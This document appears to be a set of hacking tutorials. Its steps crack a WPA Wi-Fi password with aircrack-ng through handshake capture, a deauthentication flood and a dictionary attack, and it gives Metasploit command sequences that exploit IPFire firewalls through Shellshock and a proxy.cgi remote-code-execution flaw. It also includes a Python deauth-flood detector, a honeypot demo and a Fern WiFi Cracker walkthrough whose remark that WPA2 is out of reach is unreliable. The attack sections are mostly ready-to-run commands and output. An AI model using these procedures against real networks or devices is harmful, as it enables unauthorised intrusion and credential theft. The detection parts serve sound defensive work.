Crack Wifi Password using Aircrack-ng

This is the classical method of wireless password cracking. All the other tools use this method in one way or another.
First start monitor mode, which will listen to all the Wi-Fi networks nearby, with the command:
airmon-ng start wlan0

In the lower right corner of the output you will see: monitor mode enabled for [phy1]wlan0mon


Now confirm that the Wi-Fi adapter is in monitor mode by running the command:
ifconfig
The adapter will now be listed as wlan0mon, which means it is in monitor mode.
Now run command:
airodump-ng wlan0mon
The above command lists all the Wi-Fi networks in range, together with their channel and BSSID.
When your target appears, hit Ctrl+C, then capture the handshake with the command:
airodump-ng -c 7 --bssid C8:3A:35:44:FD:F0  --write 1 wlan0mon
Here,
-c is the channel number of the AP, listed in the CH column of the previous output; in my case it is 7.
--bssid is the MAC address of the target AP; in my case the target is rajlab and its BSSID is C8:3A:35:44:FD:F0
--write is the prefix of the capture file in which the captured packets will be saved; in my case I have named it 1

Option    Description
-c        The channel of the wireless network
--bssid   The MAC address of the access point
-w        The file name prefix for the file which will contain the authentication handshake
mon0      The wireless interface (wlan0mon in this example)




Now start the deauth attack to disconnect all the clients connected to that AP; when they reconnect, the handshake can be captured. The command is:
aireplay-ng -0 100 -a C8:XX:35:XX:F0 -e rajlab wlan0mon
Here,
-0 selects the deauth attack
100 is the number of deauth packets to be sent
-a is the MAC address of the target AP
-e is the ESSID of the target AP, i.e. the name of the target network


After launching the deauth attack, the airodump-ng window from before will show WPA handshake in its top right corner; then hit Ctrl+C there.


Now crack the password with aircrack-ng by typing the command:
aircrack-ng 1-01.cap -w /usr/share/nmap/nselib/data/passwords.lst
Here,
1-01.cap is the capture file generated by airodump-ng (prefix 1, first capture).
-w is the wordlist to be used for the dictionary attack
In my case the key is found: KEY FOUND! [raj123987]
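The deauth step above is also what a wireless IDS looks for on the defending side. The following detector is an added example, not code from the original article or from the aircrack-ng project: it parses raw 802.11 management frames (no radiotap header), counts deauthentication frames per BSSID in a sliding one-second window, and reports the BSSIDs whose deauth rate and broadcast-destination count look like a flood. The frame builder, the locally administered MAC addresses, the timestamps and the threshold are constructed sample values.

```python
import struct
from collections import defaultdict

DEAUTH_FC0 = 0xC0                # frame control byte 0: type 0 (management), subtype 12 (deauth)
BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_frame(frame: bytes):
    """Return (type, subtype, addr1, addr2, addr3) from a raw 802.11 MAC header, or None if truncated."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]               # bits 2-3 are the frame type, bits 4-7 the subtype
    return (fc0 >> 2) & 3, fc0 >> 4, mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22])

def build_deauth(dst: str, bssid: str, reason: int = 7) -> bytes:
    """Constructed sample deauth: FC, duration, addr1=dst, addr2=addr3=bssid, seq ctrl, reason code."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    return struct.pack("<BBH", DEAUTH_FC0, 0, 0) + mac(dst) + mac(bssid) * 2 + struct.pack("<HH", 0, reason)

def detect_deauth_flood(frames, window=1.0, threshold=20):
    """frames: iterable of (timestamp_seconds, raw_frame). Returns {bssid: (peak_in_window, broadcast_count)}
    for each BSSID that sends at least `threshold` deauths inside any `window`-second span."""
    stamps, bcast = defaultdict(list), defaultdict(int)
    for ts, raw in frames:
        parsed = parse_frame(raw)
        if parsed and parsed[0] == 0 and parsed[1] == 12:     # management / deauthentication
            stamps[parsed[4]].append(ts)
            bcast[parsed[4]] += parsed[2] == BROADCAST
    alerts = {}
    for bssid, times in stamps.items():
        times.sort()
        start, peak = 0, 0
        for end, ts in enumerate(times):                   # sliding window over sorted timestamps
            while ts - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[bssid] = (peak, bcast[bssid])
    return alerts

def sample_capture():
    """Constructed capture: a 100-frame broadcast deauth burst from one AP, two isolated deauths from another."""
    attacked, quiet = "02:00:00:00:00:01", "02:00:00:00:00:02"
    frames = [(i / 100, build_deauth(BROADCAST, attacked)) for i in range(100)]
    frames += [(5.0, build_deauth("02:00:00:00:00:aa", quiet)), (60.0, build_deauth("02:00:00:00:00:bb", quiet))]
    return frames
```

On a real capture you would feed detect_deauth_flood the (timestamp, frame) pairs read from a monitor-mode pcap after stripping the radiotap header; an alert where nearly every frame is addressed to the broadcast MAC matches the aireplay-ng pattern shown above, since a legitimate AP rarely deauthenticates every client at once.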

Exploit Linux PC using IPFire Bash Environment Variable Injection (Shellshock)


Exploit Targets
IPFire 2.15

Requirements
Attacker: Kali Linux
Victim PC: Linux


Open a Kali terminal and type msfconsole


msf exploit (ipfire_bashbug_exec)>set rhost 192.168.0.176
msf exploit (ipfire_bashbug_exec)>set username admin
msf exploit (ipfire_bashbug_exec)>set payload cmd/unix/generic
msf exploit (ipfire_bashbug_exec)>set cmd uname -a
msf exploit (ipfire_bashbug_exec)>exploit          

Exploitation in Linux Firewall using IPFire proxy.cgi RCE


Exploit Targets
IPFire 2.19

Requirements
Attacker: Kali Linux
Victim PC: Linux


Open a Kali terminal and type msfconsole


msf exploit (ipfire_proxy_exec)>set rhost 192.168.0.169 (IP of Remote Host)
msf exploit (ipfire_proxy_exec)>set password admin
msf exploit (ipfire_proxy_exec)>exploit

Detect Hacker in Network using Android Phone

HosTaGe is a mobile honeypot that detects attacks on wireless networks.

First of all, search for the HosTaGe honeypot on the Android Play Store.


Now click on the app shown above and install it.


Now, for testing, I will start an nmap version scan of the Android phone from my system with the command:
nmap -sV 192.168.0.107
Here 192.168.0.107 is my target IP.
As you can see, various fake services are started, as shown in the nmap results.


As soon as the nmap scan starts, the Android icon turns red and an alarm sounds.

Cracking Wifi Password using Fern WIFi Cracker

Fern is a Python-based Wi-Fi cracker tool used for security auditing purposes. The program is able to crack and recover WEP/WPA/WPS keys and also run other network-based attacks on wireless or Ethernet-based networks. The tool is available both as open source and as a premium version of the free tool. In this article we'll be demonstrating a WPA dictionary attack using the open source version. You can check the link to download it here.

First step is to launch the tool. If you have installed all of the requirements mentioned, you’ll be able to see the following screen.

 


In the first option, the user selects the wireless interface from the drop-down menu. Here we have selected the wlan0 interface. As you can see, Fern has automatically put wlan0 into monitor mode.

 


Monitor Mode: By default a NIC only captures packets addressed to that specific device. Monitor mode is essentially the wireless equivalent of promiscuous mode: it allows a Wi-Fi adapter to capture 802.11 management, data and control frames without having to associate with an access point first. Hence raw pcap files captured by a wireless adapter in monitor mode can be used for auditing and/or hacking purposes.

 

Once we have chosen the interface, we need to scan for access points.

 


Here, observe that the scan has found a total of 18 access points.

 

 

Access Point: A device that sends out wireless signals. Essentially, the internet connection from a router runs down to an access point, which lets users access the internet over the IEEE 802.11 protocol (commonly known as Wi-Fi). In day-to-day usage, the Wi-Fi router set up at home also serves as the wireless access point.

 

SSID: The Service Set Identifier is the name given to an access point for simplicity.

 

Launching the attack: Now click on the discovered access point, choose a dictionary file and click Launch Attack with the chosen dictionary. It is that simple! As you can see, we have a matched credential and the password for the SSID is shown below.

 

Please note that this program is only able to crack WPA/WEP/WPS keys. For tools that work on stronger encryption like WPA2, please refer to the latest article on wireless penetration testing on Hacking Articles. Thanks for reading.